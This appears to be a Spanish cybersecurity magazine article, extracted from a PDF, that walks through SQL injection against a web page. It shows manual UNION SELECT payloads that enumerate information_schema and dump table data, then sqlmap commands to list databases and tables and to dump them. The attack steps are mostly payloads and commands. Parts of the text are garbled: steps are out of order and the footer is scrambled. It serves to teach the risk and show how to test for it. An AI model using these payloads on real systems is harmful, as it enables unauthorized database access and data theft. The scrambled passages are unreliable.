La Inyección de codigo es la vulnerabilidad numero 1 según el OWASP top 10, por lo que debería ser el primer tema de veriﬁcación de nuestras aplicaciones web. Para saber si mi página es vulnerable a sql injection existen diversas maneras de detectarlo, una de las pruebas más

NOISE REVISTA DE CIBERSEGURIDAD

sencillas es agregando una apóstrofe justo después del id y si nos devuelve un error relacionado a una consulta mal hecha hacia la base de datos, quiere decir que somos vulnerables. Sin embargo el no recibir el error, no implica que estemos libres de esa vulnerabilidad, veamos como interpreta la prueba nuestro servidor.

Conociendo que la página es vulnerable, podemos preguntarle en primer instancia de cuantas tablas dispone, para ello quitamos el apóstrofe anterior y agregamos un order by + número aleatorio. Este número aleatorio irá aumentando hasta que se nos muestre un error en la página, porque

signiﬁcará que hemos sobre pasado el número de tablas de las que dispone la base de datos. Por ejemplo, esta página dispone de 10 tablas, por eso no da error al insertar el order by (se muestra el contenido habitual):

Pero si colocamos order by 11, nos mostrará error porque hemos sobre pasado el número de tablas de las que dispone la

base de datos (Esto puede variar en cada caso, a veces puede superar las 50 tablas)

Ahora colocamos un signo menos al id en prueba y agregamos la siguiente sentencia+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10–.

Estos números indican el número de tablas, por eso he llegado hasta 10 pero como mencioné anteriormente, esto puede variar.

NOISE REVISTA DE CIBERSEGURIDAD

¿Qué es lo peor que podría pasar si mi página es vulnerable a SQL injection?

quedando nuestra inyección de la siguiente manera: hora colocamos un signo menos al id en prueba y agregamos la siguiente sentencia+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10–.

Observen que nos devuelve el nombre de una tabla. Para ver otras tablas agregaremos justo después de tables lo siguiente +limit+2,1– (Donde la posición del 2 irá en aumento hasta encontrar una tabla de nuestro interés y por su puesto que esto también tiene un límite, al mostrarse un

error en pantalla querrá decir que el número de esa tabla no existe). En este ejemplo ocuparemos el número 18, que corresponde a la tabla categorías y se muestra como parte del contenido, quedando de la siguiente manera:

Ahora, tomamos el nombre de dicha tabla y lo convertimos a un valor ASCII, pueden utilizar la siguiente página >>>>>>>>>>>>

https://www.easycalculation.com/ascii-hex.php. Quedará de la siguiente manera:

Le ordenaremos a la base de datos a que nos retorne las columnas de la tabla que le indicaremos en valores ascii, haremos un par de cambios como sustituir el valor table_name por group_concat(column_name) y el valor information_schema.tables por information_schema.colum

n s + w h e r e + t a b l e _ n a m e = char(99,97,116,101,103,111,114.105,101,115) el valor dentro de char es el ascii que hemos obtenido de la tabla categories, sustituiremos esos espacios por comas (,). La inyección quedará de la siguiente manera:

NOISE REVISTA DE CIBERSEGURIDAD

Nos arroja, dos números en pantalla, podemos escoger cualquiera de ellos, en este caso seleccionamos el 4 y en la sentencia que se ha ingresado anteriormente, sustituimos el número 4 por table_name y agregamos al ﬁnal +from+information_schema.tables–

-65+UNION+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10+from+information_schema.columns+where+table_name=char(99,97,116,101,103,111,114,10 5,101,115)–

Observe que se muestra en pantalla las columnas de la tabla categories, ahora nuestro interés está enfocado en conocer el contenido de esas columnas. A continuación le haremos otros cambios a nuestra inyección, sustituiremos el valor group_concat(column_name) por concat(id,0x3a,teamid,0x3a,category,0x3a,sta

tus,0x3a,panel,0x3a,sort), el 0x3a signiﬁ ca que quiero que me muestre dos puntos (:) para delimitar los resultados que se arrojarán. De igual forma cambiaremos el valor de +from+information_schema.columns+where+table_name=char(99,97,116,101,103,111,114,105,101,115)–

Los valores que hemos obtenido corresponden al contenido de una de las columnas de la tabla categories.

NOISE ACADEMIA

Presenta tu membresía

20% En todos los cursos

y participa en este descuento para tus cursos. * Este cupón de descuento es válido por cada curso individual. * Este cupón de descuento es válido uno por persona.

NOISE REVISTA DE CIBERSEGURIDAD

CUPÓN DE DESCUENTO

¿Se pueden hacer estas pruebas de forma automatizada? La respuesta es, SI, pero es importante entender que es lo que hace la herramienta, es decir, hace lo mismo que hemos hecho hasta acá y mucho más, solo que en milésimas de segundos, a continuación una muestra: Utilizaremos sqlmap de kali linux, esta es una poderosa herramienta desarrollada en Python para hacer inyecciones sql de forma automática, está orientada hacia las aplicaciones web, evalúa si posee la vulnerabilidad y de encontrarse se aprovecha de ella y la explota.

EY como paso ﬁnal , explotará la vulnerabilidad y nos mostrará las bases de datos disponibles para dicha página.

En nuestras pruebas paso a paso nos topamos con la deﬁciencia de que todas las tablas están revueltas, no conocemos a que base de datos pertenece pero con sqlmap esto se nos facilita un poco más. Le preguntamos a la página cual es su base de datos principal con el comando sqlmap -u ‘link+de+la+pagina+con+posible+id+inyectable’ –random-agent –current-db

Nos arrojará el siguiente resultado:

Basta con utilizar el comando sqlmap -u ‘link+de+la+pagina+con+posible+id+inyect able’ –random-agent -v 3 –dbs Quiere decir que en este caso, la base de datos principal para esa página tiene el nombre de ‘legends’, entonces preguntemosle cuales son sus tablas, con el comando:

Si encuentra que la página es vulnerable a inyecciones sql aparecerá algo como lo siguiente:

–random-agent -D legends –tables

Debería mostrarnos el nombre de todas las tablas, observe que listó la tabla categories, misma que hemos

NOISE REVISTA DE CIBERSEGURIDAD

sqlmap -u ‘link+de+la+pagina+con+posible+id+inyectable’

Ahora, necesitamos saber cual es el contenido que guardan las columnas de la tabla categories, utilizaremos el comando sqlmap -u‘link+de+la+pagina+con+posible+id+inyectable’ –random-agent -D legends -T categories –dump

El resultado se muestra a continuación, observe que son las mismas columnas.

Ahora que conocemos las tablas, preguntémosle a la misma categories cuales son sus columnas (debe mostrar las mismas de la evaluación paso a paso). Utilizaremos el comando: sqlmap -u ‘link+de+la+pagina+con+posible+id+inyectable’

Ahora, necesitamos saber cual es el contenido que guardan las columnas de la tabla categories, utilizaremos el comando

–random-agent -D legends -T categories –columns

sqlmap -u ‘link+de+la+pagina+con+posible+id+inyectable’

El resultado se muestra a continuación, observe que son las mismas columnas.

–random-agent -D legends -T categories –dump

NOISE REVISTA DE CIBERSEGURIDAD

El resultado será el siguiente:

NOISE

Observe que la primera ﬁla de datos fue la que hemos obtenido en nuestra prueba de concepto paso a paso, es decir, ambas pruebas han sido un éxito y hemos evaluado el panorama desde dos perspectivas similares, siempre es aconsejable hacer las dos para validar los resultados.

ACADEMIA

Envíanos al correo informacion@noise-sv.com El codigo correcto para desbloquear el candado este consta de tres digitos y participarán en regalo sorpresa.

Conclusiones: Nótese que hemos utilizado una tabla aparentemente con poca información útil, pero ¿Y si nuestra página contara con tablas sensibles que alojen credenciales de usuarios administradores? sería más comprometedor para la empresa, es por eso que la ciberseguridad debe tomarse con más seriedad, pues los ciberataques ya no son más un cuento de ciencia ﬁcción, son una realidad y todos deben estar conscientes de ello.

NOISE REVISTA DE CIBERSEGURIDAD

Por: Daniel Benavides @daniel_noisesv

ESPERA NUESTRA tercera EDICIÓN 03

E S I O N E NOIS NOISE

B E RDS E G U R I D A D R E V I S T AR SDEEG UCRI I D A BE DE CI A T S REVISTA DE C REVI IBERSEGURIDA D

em riaplryesariaol. y Estremaptergeia a s a .rmátic fo in o o it c i t á m Es Estratelgiti oelindfel r tr ategia empresarial y o el de el delito informático.

icenasfo át , rense, e Infocrm r o f i aeserva ciaid. encia. ridlaenev ormoátpr v e Infco a l r serva Info ática forense, como pre como prrm eservar la evidencia.

http://www.noise-sv.com/ Teléfonos : 7930-2011/ 7235-5175